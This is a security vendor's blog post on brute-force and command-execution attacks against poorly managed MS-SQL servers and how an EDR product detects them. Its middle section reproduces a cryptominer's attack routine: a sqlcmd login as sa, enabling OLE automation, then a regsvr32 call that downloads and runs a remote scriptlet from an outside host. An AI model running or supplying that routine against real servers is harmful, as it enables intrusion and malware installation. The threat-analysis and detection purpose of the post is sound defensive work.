Attacks Targeting MS-SQL Servers Detected by AhnLab EDR

MS-SQL servers are one of the main attack vectors used when targeting Windows systems because they use simple passwords and are open publicly to the external Internet. Threat actors find poorly managed MS-SQL servers and scan them before carrying out brute force or dictionary attacks to log in with administrator privileges. Once the threat actors have reached this point, they then utilize various means to install malware and gain control over the infected systems.

AhnLab SEcurity intelligence Center (ASEC) monitors attacks targeting poorly managed MS-SQL servers and shares new attack cases on the ASEC Blog. One of the recent cases is TargetCompany’s installation of Mallox ransomware and Remcos RAT through MS-SQL servers [1]. Many threat actors that use tools such as Trigona ransomware [2], Cobalt Strike [3], and Proxyware are using MS-SQL servers as the means of initial access. Aside from ransomware and CoinMiner threat actors, there are also cases of state-sponsored APT groups attacking MS-SQL servers. For example, the Andariel group used MS-SQL servers to install the NukeSped backdoor [4].

AhnLab Endpoint Detection and Response (EDR) is a next-generation threat detection and response solution, providing powerful threat monitoring, analysis, and response capabilities for endpoint areas based on Korea’s only self-behavior-based engine. AhnLab EDR continuously collects information related to suspicious behaviors based on each type, allowing users to precisely perceive threats from a detection, analysis, and response perspective. Users then can conduct comprehensive analysis based on the data to identify causes, respond with appropriate measures, and establish processes to prevent threat recurrence.

This article discusses cases in which administrators can utilize AhnLab EDR to detect attacks targeting MS-SQL servers—one of the initial access methods—in advance to discover causes and respond with appropriate measures.


1. Brute Force Attacks & Dictionary Attacks

Generally, threat actors and malware search for environments where the MS-SQL service has been installed by scanning for servers with the 1433 port open. After the scanning process, they attempt to log in to the confirmed MS-SQL server through brute force or dictionary attacks. Note that most features that make it possible to execute Windows OS commands require an SQL Admin (sa), in other words, an admin account.

There are cases where the threat actor does not perform the scan and dictionary attack, but instead, the malware spreads by self-propagating to poorly managed MS-SQL servers. The most notable in this case is the LemonDuck CoinMiner [5]. (This link is only available in Korean for now.) The following is a list of sa account passwords used by LemonDuck when performing dictionary attacks.

Figure 1. List of passwords used by LemonDuck for dictionary attacks

In addition, while LemonDuck uses dictionary attacks against MS-SQL servers during its internal propagation process (also known as lateral movement), Kingminer [6] and Vollgar CoinMiner [7] employ brute force attacks against externally accessible MS-SQL servers.

AhnLab EDR detects as a key behavior the activity of logging into MS-SQL servers using an SQL admin (sa) account as shown below, helping administrators to notice the behavior in advance.

Figure 2. Detection logs displayed when an external user logs in successfully using an SQL admin account

Additionally, AhnLab EDR detects as a key behavior multiple login failure events that occurred due to brute force attacks and dictionary attacks as shown below, helping administrators to discover causes and form appropriate measures.

Figure 3. Detection logs displayed when multiple login failure events occur

2. Activating Command Execution

After obtaining an sa account or sa account privileges, the threat actor or malware either executes malicious commands or installs the actual malware to obtain control over the infected system. It should be noted that sa account privileges only grant control over the MS-SQL database servers, and not the Windows OS itself. In other words, although the execution of SQL commands is allowed, features that can directly impact the Windows OS are not provided by default.

However, MS-SQL provides various features that allow the execution of OS commands in the Windows OS. Exploiting this ultimately allows the execution of OS commands. For instance, xp_cmdshell commands provide a feature that executes commands received as arguments in Windows shell. Windows commands executed as xp_cmdshell commands are run via “cmd.exe /c” commands by the sqlservr.exe process.

Out of many malware strains, LemonDuck downloads additional malware by utilizing xp_cmdshell. LemonDuck is also prepared for cases where xp_cmdshell is unregistered instead of disabled as it also includes a re-registration process.

Figure 4. LemonDuck using xp_cmdshell commands

The method that uses the OLE stored procedure involves exploiting OLE’s feature to execute other applications, that is malicious commands or malware strains. OLE is also disabled like the xp_cmdshell commands, so it must be enabled as well.

The following is a reproduction of the actual attack routine used by the MyKings CoinMiner malware. [8] (This link is only available in Korean for now.)

CMD > sqlcmd -S [IP address] -U sa -P [Password]
1> sp_configure ‘show advanced options’, 1;
2> RECONFIGURE;
3> go
1> sp_configure ‘Ole Automation Procedures’,1;
2> RECONFIGURE;
3> go
1> DECLARE @shell INT
2> EXEC SP_OAcreate ‘{72C24DD5-D70A-438B-8A42-98424B88AFB8}’,@shell OUTPUT
3> EXEC SP_OAMETHOD @shell,’run’,null, ‘regsvr32 /u /s /i:hxxp://js.f4321y[.]com:280/v.sct scrobj.dll’;
4> go

MS-SQL servers support a method called the extended stored procedure in order to provide an expanded range of features. Threat actors can create malicious DLLs, register them, and then use them to perform malicious behaviors. The CLR stored procedure is similar to the extended stored procedure, but it can be distinguished by its use of .NET DLLs. In addition, an activation process like xp_cmdshell commands is required to register and use the CLR stored procedure.

As mentioned above, LemonDuck uses not only xp_cmdshell, but also the CLR stored procedure.

Figure 5. LemonDuck using the CLR stored procedure assembly

AhnLab EDR detects as a threat the above behavior of configuring the system to allow the execution of OS commands in MS-SQL servers as shown below, helping administrators to notice the behavior in advance.

Figure 6. Detection logs for the behavior of configuring the system to allow the execution of OS commands

3. Executing Commands Using MS-SQL

After activating the settings above, threat actors can execute commands inside the infiltrated system. This means that they can directly execute commands using the xp_cmdshell command or OLE stored procedure. They can also register CLR SqlShell using the CLR stored procedure and use SqlShell to execute commands. In this case, the MS-SQL service (sqlservr.exe) becomes the subject that executes commands.

AhnLab EDR detects as a key behavior the activity of MS-SQL servers executing suspicious processes as shown below, helping administrators to notice the behavior in advance.

Figure 7. Detection logs about MS-SQL service executing OS commands

4. Conclusion

Various threat actors including ransomware, CoinMiner, and APT groups are targeting poorly-managed MS-SQL servers. In the case of MS-SQL servers that are targeted for attacks, there are many cases where they are installed together during the installation process of ERP and business solutions, in addition to being directly built as database servers.

Administrators must use passwords that are difficult to guess for their accounts and change them periodically to protect the database server from brute force attacks and dictionary attacks. They must also apply the latest patches to prevent vulnerability attacks. In addition, they must use security programs such as firewalls for database servers accessible from outside to restrict access from attackers.

AhnLab EDR detects the following as threats and key behaviors: initial access methods such as brute force attacks and dictionary attacks, techniques that configure the targeted systems to allow the execution of OS commands, and the behavior of ultimately executing commands via the MS-SQL service. Based on the detection, administrators can identify the cause and respond appropriately. Even after being exposed to a ransomware attack, administrators can verify the evidence data from the systems that have become attack targets, which is necessary for incident investigations.

Behavior Detection
– InitialAccess/DETECT.BruteForce.M11704
– InitialAccess/DETECT.Event.M11702
– Execution/EDR.Event.M11704
– InitialAccess/DETECT.Event.M11453

AhnLab EDR protects the endpoint environment by delivering behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting. For more information about the product, please visit our official website.

The post Attacks Targeting MS-SQL Servers Detected by AhnLab EDR appeared first on ASEC BLOG.

Article Link: Attacks Targeting MS-SQL Servers Detected by AhnLab EDR - ASEC BLOG